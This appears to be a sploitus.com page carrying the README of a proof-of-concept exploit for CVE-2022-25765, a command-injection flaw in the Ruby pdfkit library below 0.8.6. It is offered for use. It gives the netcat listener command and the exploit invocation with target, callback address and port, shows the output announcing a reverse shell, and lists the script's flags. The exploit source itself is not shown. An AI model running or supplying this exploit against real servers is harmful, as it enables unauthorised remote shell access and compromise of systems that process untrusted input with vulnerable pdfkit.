## https://sploitus.com/exploit?id=38A6D118-ABAB-59DD-9EA2-5FD83636A6BE
# PDFkit-CMD-Injection (CVE-2022-25765)
Exploit for **CVE-2022-25765** command injection in pdfkit < 0.8.6
See more details about the vulnerability [here](https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795)
## PoC
Run the netcat on your host:
```
$ nc -lvnp 1337
```
Run the exploit (example):
```
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
```
Flags:
```
-t, --target Address of target in http-format
-a, --addr Address for reverse connect
-p, --port Port for reverse connect, 9001 by default
```